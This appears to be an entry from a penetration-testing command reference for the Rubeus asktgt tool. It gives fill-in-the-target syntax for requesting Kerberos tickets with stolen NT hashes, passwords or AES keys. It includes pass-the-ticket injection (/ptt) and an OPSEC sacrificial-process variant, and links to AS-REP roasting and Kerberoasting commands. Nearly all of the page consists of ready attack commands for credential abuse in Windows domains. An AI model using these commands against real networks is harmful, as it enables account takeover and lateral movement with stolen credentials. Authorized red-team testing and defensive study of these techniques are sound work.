Rubeus asktgt
Request a TGT for a user with a password, NT hash, or AES key. /ptt injects it into the current session; /createnetonly spawns a sacrificial process. The Rubeus equivalent of getTGT.py.
- Tool
- Rubeus.exe
- Category
- Credential Attacks / Kerberoasting
- Platform
- windows
- Requires
- NTLM hash
- Protocols
- KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
Rubeus.exe asktgt /user:<user> /rc4:<nt-hash> /domain:<domain> /nowrap
Credential variants
The same attack using a different authentication material.
Password Auth requires password
Rubeus.exe asktgt /user:<user> /password:<password> /domain:<domain> /nowrap
AES256 requires AES key
Rubeus.exe asktgt /user:<user> /aes256:<aes-key> /domain:<domain> /nowrap
Inject Ticket requires NTLM hash
Rubeus.exe asktgt /user:<user> /rc4:<nt-hash> /domain:<domain> /ptt
OPSEC Sacrificial Process requires NTLM hash
Rubeus.exe asktgt /user:<user> /rc4:<nt-hash> /domain:<domain> /createnetonly:C:\Windows\System32\cmd.exe
Examples
Rubeus.exe asktgt /user:jdoe /rc4:abcd1234... /domain:corp.local /ptt
Tags
Related commands
- Impacket AS-REP Roast AS-REP Roasting for accounts without Kerberos Pre-Authentication
- Impacket Get TGT Get TGT to be used in Kerberos authentication
- Impacket Kerberoast Extract service account hashes via Kerberoasting
- Impacket KeyListAttack Abuse RODC (Read-Only DC) credential caching to retrieve hashes for accounts cached on…
- Impacket Targeted Kerberoast Request a TGS only for a specific service account instead of every kerberoastable user…
- NetExec LDAP AS-REP Roasting Request AS-REP responses for every account with DONT_REQ_PREAUTH set and write hashes to…
- NetExec LDAP Kerberoasting Request TGS tickets for every account with a SPN and write hashes to a file ready for…
- NetExec LDAP Pre-Windows 2000 Accounts Enumerate pre-Windows 2000 compatible computer accounts that use the hostname as password